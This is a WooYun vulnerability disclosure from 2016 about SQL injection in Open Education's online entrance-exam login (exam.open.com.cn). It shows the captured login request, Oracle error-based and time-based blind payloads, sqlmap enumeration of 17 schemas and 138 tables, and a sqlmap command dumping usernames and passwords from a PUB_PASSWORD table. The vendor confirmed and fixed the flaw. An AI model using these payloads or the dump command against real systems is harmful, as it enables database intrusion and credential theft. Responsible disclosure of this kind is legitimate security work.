当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2016-0176322
漏洞标题:
奥鹏教育某机考系统存在SQL注入漏洞
相关厂商:
open.com.cn
漏洞作者:
指尖上的故事
提交时间:
2016-02-17 09:16
修复时间:
2016-02-18 13:56
公开时间:
2016-02-18 13:56
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
厂商已经修复
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2016-02-17: 细节已通知厂商并且等待厂商处理中
2016-02-17: 厂商已经确认,细节仅向厂商公开
2016-02-18: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

.....

详细说明:

http://exam.open.com.cn/matriculationonline/login.asp 奥鹏教育远程教育中心--入学测试现考系统
登录处抓包:

POST /matriculationonline/authenticate.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://exam.open.com.cn/matriculationonline/login.asp
Content-Type: text/xml; charset=gb2312
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: exam.open.com.cn
Content-Length: 131
Pragma: no-cache
Cookie: ASPSESSIONIDASQCRADQ=EIPCOLIBGJNLCMPMHKDDNPEN
<?xml version="1.0" encoding="gb2312"?>
<LoginInfo><UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>


存在POST注入....

漏洞证明:

Place: POST
Parameter: Imp_userstat
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 1574=(SELE
CT UPPER(XMLType(CHR(60)||CHR(58)||CHR(105)||CHR(120)||CHR(101)||CHR(58)||(SELEC
T (CASE WHEN (1574=1574) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(1
08)||CHR(118)||CHR(58)||CHR(62))) FROM DUAL)&imageField.x=23&imageField.y=10
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 9663=DBMS_
PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(84)||CHR(78)||CHR(68),5)&imageField.x=23&image
Field.y=10
---
[04:15:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.4
back-end DBMS: Oracle
[04:15:40] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[04:15:40] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HAIHONG
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WSD
[*] XDB
跑一下WSD.....
[04:10:57] [INFO] retrieved: WSD
[04:10:58] [INFO] retrieved: PUB_ORDER
[04:10:58] [INFO] retrieved: WSD
[04:10:59] [INFO] retrieved: ZX_PUB_PROVINCE
[04:11:00] [INFO] retrieved: WSD
[04:11:00] [INFO] retrieved: ZX_UNT_SAL_APPLY_LOG
[04:11:01] [INFO] retrieved: WSD
[04:11:02] [INFO] retrieved: ZX_WLS_SAL_APPLY_GEN_LOG
[04:11:02] [INFO] retrieved: WSD
[04:11:03] [INFO] retrieved: YSJ_1
[04:11:04] [INFO] retrieved: WSD
[04:11:05] [INFO] retrieved: YSJ_USES
[04:11:05] [INFO] retrieved: WSD
[04:11:06] [INFO] retrieved: YSJ_GOODS
[04:11:07] [INFO] retrieved: WSD
[04:11:07] [INFO] retrieved: ZX_CUSTOM_CORPORATION
[04:11:08] [INFO] retrieved: WSD
[04:11:09] [INFO] retrieved: ZX_CUSTOM_ZZ_MYYJK
[04:11:09] [INFO] retrieved: WSD
[04:11:10] [INFO] retrieved: BMS_PR_CUSTOM
[04:11:11] [INFO] retrieved: WSD
[04:11:11] [INFO] retrieved: BMS_SA_DOC
[04:11:12] [INFO] retrieved: WSD
[04:11:13] [INFO] retrieved: BMS_SA_DTL
[04:11:14] [INFO] retrieved: WSD
[04:11:14] [INFO] retrieved: BMS_SA_INV_INFO
[04:11:15] [INFO] retrieved: WSD
[04:11:16] [INFO] retrieved: BMS_STORER_POS
[04:11:17] [INFO] retrieved: WSD
[04:11:18] [INFO] retrieved: BMS_ST_IO_DOC_TMP
[04:11:18] [INFO] retrieved: WSD
[04:11:19] [INFO] retrieved: BMS_ST_IO_DTL_TMP
[04:11:20] [INFO] retrieved: WSD
[04:11:20] [INFO] retrieved: BMS_TR_POS_DEF
[04:11:21] [INFO] retrieved: WSD
[04:11:22] [INFO] retrieved: BMS_LOT_DEF
Database: WSD
[138 tables]
+--------------------------------+
| BMS_GOODS_STATUS               |
| BMS_LOT_DEF                    |
| BMS_PR_CUSTOM                  |
| BMS_SA_DOC                     |
| BMS_SA_DTL                     |
| BMS_SA_INV_INFO                |
| BMS_STORER_POS                 |
| BMS_ST_DEF                     |
| BMS_ST_IO_DOC_TMP              |
| BMS_ST_IO_DTL_TMP              |
| BMS_ST_QTY_LST                 |
| BMS_TR_POS_DEF                 |
| DC2_COLLECTPOINT               |
| DC2_COLLECTPOINT_DTL           |
| DC2_COLUMN_INITVALUE           |
| DC2_DATA                       |
| DC2_DATA_DTL                   |
| DC2_DBVERSION                  |
| DC2_ERROR_MANAGER              |
| DC2_INFORMATION_BUFFER         |
| DC2_LOG_TABLE                  |
| DC2_LOG_TABLE_COLUMN           |
| DC2_LOG_VIEW                   |
| DC2_NODE                       |
| DC2_PROJECT_LOG                |
| DC2_RESTORE_LOG                |
| DC_BUF_000802980001            |
| DC_BUF_000812040001            |
| DC_BUF_000825240001            |
| DC_BUF_0009108F0001            |
| DC_BUF_000911FF0001            |
| DC_BUF_000952A60001            |
| DC_BUF_000C00180001            |
| DC_BUF_000D20AA0001            |
| DC_BUF_000F04320001            |
| DC_BUF_000F37940001            |
| DC_BUF_00113BCF0001            |
| DC_BUF_001301C30001            |
| DC_BUF_001304150001            |
| DC_BUF_001342600001            |
| DC_BUF_001513410001            |
| DC_BUF_0016096F0001            |
| DC_BUF_001621D90001            |
| DC_BUF_001706170001            |
| DC_BUF_00190E1D0001            |
| DC_BUF_001B02B70001            |
| DC_BUF_001D03BC0001            |
| DC_BUF_001D14020001            |
| DC_BUF_002201E60001            |
| DC_BUF_00220AC70001            |
| DC_BUF_00230D070001            |
| DC_BUF_002405930001            |
| DC_BUF_002533A20001            |
| DC_BUF_002707330001            |
| DC_BUF_00280B880001            |
| DC_BUF_002942C00001            |
| DC_BUF_002B026B0001            |
| DC_BUF_002D182C0001            |
| DC_BUF_003E06E00001            |
| LG_HIS                         |
| LG_IP                          |
| LOGIN_HISTORY                  |
| MICROSOFTDTPROPERTIES          |
| NOUSE_GOOD                     |
| ORDER_IMPORT_TMP               |
| PBCATCOL                       |
| PBCATEDT                       |
| PBCATFMT                       |
| PBCATTBL                       |
| PBCATVLD                       |
| PHONE                          |
| PHONE_CUSTOM                   |
| PLAN_TABLE                     |
| PO_HEADER                      |
| PO_LINE_LOCATION               |
| PRT_BMS_SA_WEBCON_DOC_BACK     |
| PRT_BMS_SA_WEBCON_DTL_BACK     |
| PUB_ADMIN                      |
| PUB_CUSTOMER                   |
| PUB_CUSTOM_SOURCE              |
| PUB_CUSTOM_TO_SALER            |
| PUB_CUSTOM_TO_SALER_BAK        |
| PUB_DDL                        |
| PUB_EMPLOYEE                   |
| PUB_EMP_GOODS                  |
| PUB_FACTORY                    |
| PUB_GOODS                      |
| PUB_GOODS_PRICE                |
| PUB_GOODS_VARTYPE              |
| PUB_MOBILEPHONE                |
| PUB_ORDER                      |
| PUB_PASSWORD                   |
| PUB_SALE                       |
| PUB_SMS_USER                   |
| PUB_SUPPLYER                   |
| TONGTIM_DATA                   |
| TONGTIM_MSG                    |
| TONGTIM_MSGSERVICE             |
| TONGTIM_MSGTYPE                |
| TONGTIM_MSG_BAK                |
| TONGTIM_TRIGGER                |
| UNT_SAL_APPLY                  |
| WLS_SAL_APPLY                  |
| XT_XLZZ_WSD                    |
| YSJ_1                          |
| YSJ_GOODS                      |
| YSJ_TEMP                       |
| YSJ_TEMP1                      |
| YSJ_USES                       |
| ZMH_SALE                       |
| ZMH_TEMP                       |
| ZX_BMS_COMPANY_GOODSCLASS      |
| ZX_BMS_GOODS_PRICE             |
| ZX_BMS_SA_CONNO_TICK           |
| ZX_CUSTOM_CORPORATION          |
| ZX_CUSTOM_HEALTHFOODPERMIT     |
| ZX_CUSTOM_LEGAL_INDENTURE      |
| ZX_CUSTOM_MEDDEVICEPERMIT_CLAS |
| ZX_CUSTOM_MEDDEVICESPERMIT     |
| ZX_CUSTOM_MEDMASSPERMIT        |
| ZX_CUSTOM_MEDORAPERMIT         |
| ZX_CUSTOM_MEDPASSPERMIT        |
| ZX_CUSTOM_MYBJJSFWZYXKZ        |
| ZX_CUSTOM_SPLTXKZ              |
| ZX_CUSTOM_ZZ_MYYJK             |
| ZX_CUS_LEGALINDENTURE_CLS      |
| ZX_GOODS_TR_POS_DEF            |
| ZX_PUB_CITY                    |
| ZX_PUB_COUNTY                  |
| ZX_PUB_PROVINCE                |
| ZX_SP_GOODS_CLASS              |
| ZX_TIE_ZHENGZHAO_CHECKRULE     |
| ZX_UNT_SAL_APPLY_LOG           |
| ZX_WLS_SAL_APPLY_GEN_LOG       |
| ZX_ZZ_CUSTOM_ANNALS            |
| ZX_ZZ_FACTORY_ANNALS           |
| ZX_ZZ_SUPPLY_ANNALS            |
| ZZ_CONTROL_RULE                |
+--------------------------------+


直接脱库看看
(sqlmap.py -r 1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PASSWORD --dump --threads=10 --start=1 --stop=1000)

1.png


dd.png


修复方案:

版权声明:转载请注明来源 指尖上的故事@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-02-17 10:28

厂商回复:

已提交相关人员处理。-liu

最新状态:

2016-02-18:漏洞已修复。请帮助检查,感谢!